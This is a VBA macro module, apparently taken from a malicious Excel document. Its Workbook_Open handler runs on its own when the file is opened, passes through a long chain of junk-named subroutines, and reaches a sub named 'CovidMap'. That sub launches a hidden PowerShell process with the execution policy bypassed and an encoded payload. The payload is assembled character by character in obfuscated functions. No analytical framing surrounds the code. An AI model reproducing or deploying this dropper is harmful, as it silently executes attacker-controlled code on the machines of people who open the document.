                                                                                                                                              Private Const cl2Exp18 = 262144      
                                                                                                                                              Private Const cl2Exp12 = 4096        
                                                                                                                                              Private Const cl2Exp6 = 64           
                                                                                                                                              Private Const cl2Exp8 = 256          
                                                                                                                                              Private Const cl2Exp16 = 65536       
                                                                                                                                              
                                                                                                                                              Public Function Decode64(sString As String) As String                                                    
                                                                                                                                              	Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long    
                                                                                                                                              	Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String 
                                                                                                                                              	Dim lTemp As Long                                                                                      
                                                                                                                                              	sString = Replace(sString, vbCr, vbNullString)                                                         
                                                                                                                                              	sString = Replace(sString, vbLf, vbNullString)                                                         
                                                                                                                                              	lTemp = Len(sString) Mod 4                                                                             
                                                                                                                                              	If lTemp Then                                                                                          
                                                                                                                                              		Call Err.Raise(vbObjectError, "MyDecode", "Input string is not valid Base64.")                   
                                                                                                                                              	End If                                                                                                 
                                                                                                                                              	If InStrRev(sString, "==") Then                                                                      
                                                                                                                                              		iPad = 2                                                                                             
                                                                                                                                              	ElseIf InStrRev(sString, "=") Then                                                                   
                                                                                                                                              		iPad = 1                                                                                             
                                                                                                                                              	End If                                                                                                 
                                                                                                                                              	For lTemp = 0 To 255              
                                                                                                                                              		Select Case lTemp
                                                                                                                                              			Case 65 To 90
                                                                                                                                              				bTrans(lTemp) = lTemp - 65 
                                                                                                                                              			Case 97 To 122
                                                                                                                                              				bTrans(lTemp) = lTemp - 71
                                                                                                                                              			Case 48 To 57
                                                                                                                                              				bTrans(lTemp) = lTemp + 4
                                                                                                                                              			Case 43
                                                                                                                                              				bTrans(lTemp) = 62
                                                                                                                                              			Case 47
                                                                                                                                              				bTrans(lTemp) = 63
                                                                                                                                              		End Select
                                                                                                                                              	Next lTemp
                                                                                                                                              	For lTemp = 0 To 63
                                                                                                                                              		lPowers6(lTemp) = lTemp * cl2Exp6
                                                                                                                                              		lPowers12(lTemp) = lTemp * cl2Exp12
                                                                                                                                              		lPowers18(lTemp) = lTemp * cl2Exp18
                                                                                                                                              	Next lTemp
                                                                                                                                              	bIn = StrConv(sString, vbFromUnicode) 
                                                                                                                                              	ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)
                                                                                                                                              	For lChar = 0 To UBound(bIn) Step 4
                                                                                                                                              		lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + 				lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3)) 
                                                                                                                                              		lTemp = lQuad And clHighMask
                                                                                                                                              		bOut(lPos) = lTemp \ cl2Exp16
                                                                                                                                              		lTemp = lQuad And clMidMask
                                                                                                                                              		bOut(lPos + 1) = lTemp \ cl2Exp8
                                                                                                                                              		bOut(lPos + 2) = lQuad And clLowMask
                                                                                                                                              		lPos = lPos + 3
                                                                                                                                              	Next lChar
                                                                                                                                              	sOut = StrConv(bOut, vbUnicode)    
                                                                                                                                              	If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)
                                                                                                                                              	Decode64 = sOut
                                                                                                                                              End Function
                                                                                                                                              
                                                                                                                                              
                                                                                                                                              Public Sub Pause(sngSecs As Single)
                                                                                                                                              	Dim sngEnd As Single
                                                                                                                                              	sngEnd = Timer + sngSecs
                                                                                                                                              	While Timer < sngEnd
                                                                                                                                              		DoEvents
                                                                                                                                              	Wend
                                                                                                                                              End Sub
                                                                                                                                              
                                                                                                                                              
                                                                                                                                              Private Function VerifyPath()
                                                                                                                                              	Dim fileStr As String
                                                                                                                                              	VerifyPath = Decode64(XUN_Status_IIWSY())
                                                                                                                                              End Function
                                                                                                                                              
                                                                                                                                              Private Sub CovidMap()
                                                                                                                                              	Pause (6)
                                                                                                                                              	Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
                                                                                                                                              	Set objStartup = objWMIService.Get("Win32_ProcessStartup")
                                                                                                                                              	Set objConfig = objStartup.SpawnInstance_
                                                                                                                                              	objConfig.ShowWindow = 0
                                                                                                                                              	Dim strstr As String
                                                                                                                                              	strstr = "cmd.exe /c ""powershell -ExecutionPolicy BypasS -ENC " + StrConv(Decode64(XUN_Status_IIWSY()), vbFromUnicode) + """"
                                                                                                                                              	Set objProcess = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
                                                                                                                                              	objProcess.Create strstr, Null, objConfig, intProcessID
                                                                                                                                              End Sub
                                                                                                                                              
                                                                                                                                              Private Sub Workbook_Open()
                                                                                                                                              	Call CCLMWCIDS()
                                                                                                                                              End Sub
                                                                                                                                              Public Sub CCLMWCIDS()
                                                                                                                                              	Call BAWYHCKJY
                                                                                                                                              End Sub
                                                                                                                                              Public Sub BAWYHCKJY()
                                                                                                                                              	Call QVLNNDSKO
                                                                                                                                              End Sub
                                                                                                                                              Public Sub QVLNNDSKO()
                                                                                                                                              	Call KNNPPF
                                                                                                                                              End Sub
                                                                                                                                              Public Sub KNNPPF()
                                                                                                                                              	Call JPRWYVV
                                                                                                                                              End Sub
                                                                                                                                              Public Sub JPRWYVV()
                                                                                                                                              	Call KUROX
                                                                                                                                              End Sub
                                                                                                                                              Public Sub KUROX()
                                                                                                                                              	Call JRXIGRYYS
                                                                                                                                              End Sub
                                                                                                                                              Public Sub JRXIGRYYS()
                                                                                                                                              	Call YPMONNH
                                                                                                                                              End Sub
                                                                                                                                              Public Sub YPMONNH()
                                                                                                                                              	Call COATGA
                                                                                                                                              End Sub
                                                                                                                                              Public Sub COATGA()
                                                                                                                                              	Call AQMDIAVR
                                                                                                                                              End Sub
                                                                                                                                              Public Sub AQMDIAVR()
                                                                                                                                              	Call BVPGJO
                                                                                                                                              End Sub
                                                                                                                                              Public Sub BVPGJO()
                                                                                                                                              	Call KXHYIJHM
                                                                                                                                              End Sub
                                                                                                                                              Public Sub KXHYIJHM()
                                                                                                                                              	Call NJMJWPKXQ
                                                                                                                                              End Sub
                                                                                                                                              Public Sub NJMJWPKXQ()
                                                                                                                                              	Call ALUJKC
                                                                                                                                              End Sub
                                                                                                                                              Public Sub ALUJKC()
                                                                                                                                              	Call DNSXAYNXP
                                                                                                                                              End Sub
                                                                                                                                              Public Sub DNSXAYNXP()
                                                                                                                                              	Call ZCJRIAGUQ
                                                                                                                                              End Sub
                                                                                                                                              Public Sub ZCJRIAGUQ()
                                                                                                                                              	Call ILLKSP
                                                                                                                                              End Sub
                                                                                                                                              Public Sub ILLKSP()
                                                                                                                                              	Call NEQOX
                                                                                                                                              End Sub
                                                                                                                                              Public Sub NEQOX()
                                                                                                                                              	Call KFUTZNLZL
                                                                                                                                              End Sub
                                                                                                                                              Public Sub KFUTZNLZL()
                                                                                                                                              	Call TLVGOS
                                                                                                                                              End Sub
                                                                                                                                              Public Sub TLVGOS()
                                                                                                                                              	Call OOTTQRB
                                                                                                                                              End Sub
                                                                                                                                              Public Sub OOTTQRB()
                                                                                                                                              	Call FLUZTZ
                                                                                                                                              End Sub
                                                                                                                                              Public Sub FLUZTZ()
                                                                                                                                              	Call CGZLOG
                                                                                                                                              End Sub
                                                                                                                                              Public Sub CGZLOG()
                                                                                                                                              	Call HFJWES
                                                                                                                                              End Sub
                                                                                                                                              Public Sub HFJWES()
                                                                                                                                              	Call XIPVTCZDC
                                                                                                                                              End Sub
                                                                                                                                              Public Sub XIPVTCZDC()
                                                                                                                                              	Call NSMUCQAR
                                                                                                                                              End Sub
                                                                                                                                              Public Sub NSMUCQAR()
                                                                                                                                              	Call LIOHCE
                                                                                                                                              End Sub
                                                                                                                                              Public Sub LIOHCE()
                                                                                                                                              	Call HGOJT
                                                                                                                                              End Sub
                                                                                                                                              Public Sub HGOJT()
                                                                                                                                              	Call JHHCFDZ
                                                                                                                                              End Sub
                                                                                                                                              Public Sub JHHCFDZ()
                                                                                                                                              	Call IZDFYVTMF
                                                                                                                                              End Sub
                                                                                                                                              Public Sub IZDFYVTMF()
                                                                                                                                              	Call JFXGQIB
                                                                                                                                              End Sub
                                                                                                                                              Public Sub JFXGQIB()
                                                                                                                                              	Call ROUSOTA
                                                                                                                                              End Sub
                                                                                                                                              Public Sub ROUSOTA()
                                                                                                                                              	Call JEMZL
                                                                                                                                              End Sub
                                                                                                                                              Public Sub JEMZL()
                                                                                                                                              	Call SJCJKCEIK
                                                                                                                                              End Sub
                                                                                                                                              Public Sub SJCJKCEIK()
                                                                                                                                              	Call AZZOPCRZ
                                                                                                                                              End Sub
                                                                                                                                              Public Sub AZZOPCRZ()
                                                                                                                                              	Call SMKCP
                                                                                                                                              End Sub
                                                                                                                                              Public Sub SMKCP()
                                                                                                                                              	Call KEXMPA
                                                                                                                                              End Sub
                                                                                                                                              Public Sub KEXMPA()
                                                                                                                                              	Call DNNNEG
                                                                                                                                              End Sub
                                                                                                                                              Public Sub DNNNEG()
                                                                                                                                              	Call YJIEAROTM
                                                                                                                                              End Sub
                                                                                                                                              Public Sub YJIEAROTM()
                                                                                                                                              	Call GNNYSJH
                                                                                                                                              End Sub
                                                                                                                                              Public Sub GNNYSJH()
                                                                                                                                              	Call MZAYGW
                                                                                                                                              End Sub
                                                                                                                                              Public Sub MZAYGW()
                                                                                                                                              	Call UUWMBBYKB
                                                                                                                                              End Sub
                                                                                                                                              Public Sub UUWMBBYKB()
                                                                                                                                              	 Call CovidMap()
                                                                                                                                              End Sub
                                                                                                                                              
                                                                                                                                              
                                                                                                                                              Private Function OTRB(RPNIKTOKD As String, NEUWH As String) As String
                                                                                                                                              OTRB = RPNIKTOKD + NEUWH
                                                                                                                                              End Function
                                                                                                                                              Private Function GYFM(FUUF As String, IFDHRCKM As Byte) As String
                                                                                                                                              GYFM = FUUF & Chr(IFDHRCKM)
                                                                                                                                              End Function
                                                                                                                                              Private Function FGLOUSGPMUJXUKN0() As String
                                                                                                                                                 Dim ZDOHNZM As String
                                                                                                                                              
                                                                                                                                                  ZDOHNZM = ""
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 87), 103), 66), 110), 65), 69), 73), 65), 77), 81), 66), 66), 65), 69), 99), 65), 78), 65), 66), 66)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 70), 107), 65), 100), 119), 66), 67), 65), 68), 65), 65), 81), 81), 66), 72), 65), 71), 115), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 81), 81), 66), 105), 65), 72), 99), 65), 81), 103), 66), 49), 65), 69), 69), 65), 81), 119), 66), 66)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 69), 65), 86), 81), 66), 66), 65), 69), 73), 65), 86), 65), 66), 66), 65), 69), 77), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 77), 65), 66), 66), 65), 70), 77), 65), 85), 81), 66), 67), 65), 72), 85), 65), 81), 81), 66), 73)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 48), 65), 81), 81), 66), 107), 65), 69), 69), 65), 81), 103), 66), 111), 65), 69), 69), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 82), 119), 66), 51), 65), 69), 69), 65), 89), 103), 66), 66), 65), 69), 73), 65), 98), 65), 66), 66)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 103), 65), 83), 81), 66), 66), 65), 70), 89), 65), 90), 119), 66), 66), 65), 72), 107), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 81), 81), 66), 68), 65), 69), 69), 65), 81), 81), 66), 108), 65), 72), 99), 65), 81), 81), 66), 76)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 69), 65), 81), 119), 66), 66), 65), 69), 69), 65), 83), 81), 66), 66), 65), 69), 69), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 90), 119), 66), 66), 65), 69), 77), 65), 81), 81), 66), 66), 65), 71), 77), 65), 81), 81), 66), 67)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 71), 103), 65), 81), 81), 66), 73), 65), 69), 107), 65), 81), 81), 66), 90), 65), 70), 69), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 81), 103), 66), 48), 65), 69), 69), 65), 81), 119), 66), 110), 65), 69), 69), 65), 81), 119), 66), 110)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 69), 65), 90), 119), 66), 66), 65), 69), 77), 65), 81), 81), 66), 66), 65), 69), 107), 65)
                                                                                                                                              
                                                                                                                                                  FGLOUSGPMUJXUKN0 = ZDOHNZM
                                                                                                                                              End Function
                                                                                                                                              
                                                                                                                                              Private Function FGLOUSGPMUJXUKN1() As String
                                                                                                                                                 Dim ZDOHNZM As String
                                                                                                                                              
                                                                                                                                                  ZDOHNZM = ""
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 81), 81), 66), 66), 65), 71), 99), 65), 81), 81), 66), 68), 65), 69), 69), 65), 81), 81), 66), 74)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 69), 65), 81), 81), 66), 110), 65), 69), 69), 65), 81), 119), 66), 66), 65), 69), 69), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 86), 119), 66), 51), 65), 69), 73), 65), 85), 81), 66), 66), 65), 69), 99), 65), 82), 81), 66), 66)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 71), 77), 65), 90), 119), 66), 67), 65), 71), 103), 65), 81), 81), 66), 72), 65), 68), 65), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 81), 81), 66), 97), 65), 70), 69), 65), 81), 103), 65), 119), 65), 69), 69), 65), 82), 119), 66), 86)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 69), 65), 89), 119), 66), 110), 65), 69), 69), 65), 98), 119), 66), 66), 65), 69), 85), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 77), 65), 66), 66), 65), 70), 107), 65), 85), 81), 66), 67), 65), 72), 85), 65), 81), 81), 66), 72)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 70), 69), 65), 81), 81), 66), 90), 65), 70), 69), 65), 81), 103), 65), 119), 65), 69), 69), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 82), 119), 65), 52), 65), 69), 69), 65), 89), 119), 66), 110), 65), 69), 73), 65), 78), 81), 66), 66)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 81), 65), 77), 65), 66), 66), 65), 69), 111), 65), 81), 81), 66), 67), 65), 68), 65), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 81), 81), 66), 73), 65), 69), 107), 65), 81), 81), 66), 107), 65), 70), 69), 65), 81), 103), 66), 115)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 69), 65), 81), 119), 66), 51), 65), 69), 69), 65), 83), 81), 66), 66), 65), 69), 73), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 85), 81), 66), 66), 65), 69), 99), 65), 79), 65), 66), 66), 65), 71), 77), 65), 100), 119), 66), 67)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 72), 65), 65), 81), 81), 66), 73), 65), 70), 69), 65), 81), 81), 66), 104), 65), 70), 69), 65)
                                                                                                                                              
                                                                                                                                                  FGLOUSGPMUJXUKN1 = ZDOHNZM
                                                                                                                                              End Function
                                                                                                                                              
                                                                                                                                              Private Function FGLOUSGPMUJXUKN2() As String
                                                                                                                                                 Dim ZDOHNZM As String
                                                                                                                                              
                                                                                                                                                  ZDOHNZM = ""
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 81), 103), 66), 50), 65), 69), 69), 65), 82), 119), 65), 48), 65), 69), 69), 65), 85), 65), 66), 82)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 69), 65), 100), 119), 66), 66), 65), 69), 77), 65), 97), 119), 66), 66), 65), 70), 103), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 85), 81), 66), 66), 65), 69), 115), 65), 81), 81), 66), 68), 65), 69), 69), 65), 81), 81), 66), 74)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 69), 65), 81), 81), 66), 110), 65), 69), 69), 65), 81), 119), 66), 66), 65), 69), 69), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 83), 81), 66), 66), 65), 69), 69), 65), 90), 119), 66), 66), 65), 69), 77), 65), 81), 81), 66), 66)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 107), 65), 81), 81), 66), 67), 65), 71), 73), 65), 81), 81), 66), 73), 65), 69), 48), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 81), 81), 66), 107), 65), 69), 69), 65), 81), 103), 66), 53), 65), 69), 69), 65), 82), 119), 66), 114)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 69), 65), 89), 103), 66), 110), 65), 69), 73), 65), 98), 103), 66), 66), 65), 69), 89), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 77), 65), 66), 66), 65), 69), 107), 65), 81), 81), 66), 66), 65), 71), 115), 65), 81), 81), 66), 72)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 72), 99), 65), 81), 81), 66), 104), 65), 70), 69), 65), 81), 103), 66), 49), 65), 69), 69), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 82), 119), 66), 122), 65), 69), 69), 65), 84), 65), 66), 66), 65), 69), 69), 65), 83), 119), 66), 66)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 77), 65), 81), 81), 66), 66), 65), 69), 107), 65), 81), 81), 66), 66), 65), 71), 99), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 81), 81), 66), 68), 65), 69), 69), 65), 81), 81), 66), 74), 65), 69), 69), 65), 81), 81), 66), 110)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 69), 65), 81), 119), 66), 66), 65), 69), 69), 65), 83), 81), 66), 66), 65), 69), 73), 65)
                                                                                                                                              
                                                                                                                                                  FGLOUSGPMUJXUKN2 = ZDOHNZM
                                                                                                                                              End Function
                                                                                                                                              
                                                                                                                                              Private Function FGLOUSGPMUJXUKN3() As String
                                                                                                                                                 Dim ZDOHNZM As String
                                                                                                                                              
                                                                                                                                                  ZDOHNZM = ""
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 89), 103), 66), 66), 65), 69), 89), 65), 81), 81), 66), 66), 65), 70), 107), 65), 85), 81), 66), 67)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 72), 107), 65), 81), 81), 66), 72), 65), 69), 85), 65), 81), 81), 66), 105), 65), 70), 69), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 81), 103), 66), 115), 65), 69), 69), 65), 83), 65), 66), 82), 65), 69), 69), 65), 87), 103), 66), 82)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 73), 65), 101), 81), 66), 66), 65), 69), 77), 65), 90), 119), 66), 66), 65), 70), 81), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 85), 81), 66), 67), 65), 71), 103), 65), 81), 81), 66), 72), 65), 68), 81), 65), 81), 81), 66), 97)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 69), 65), 81), 103), 66), 111), 65), 69), 69), 65), 83), 65), 66), 82), 65), 69), 69), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 89), 103), 66), 51), 65), 69), 73), 65), 101), 81), 66), 66), 65), 69), 103), 65), 97), 119), 66), 66)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 70), 65), 65), 85), 81), 66), 66), 65), 71), 115), 65), 81), 81), 66), 73), 65), 70), 69), 65)
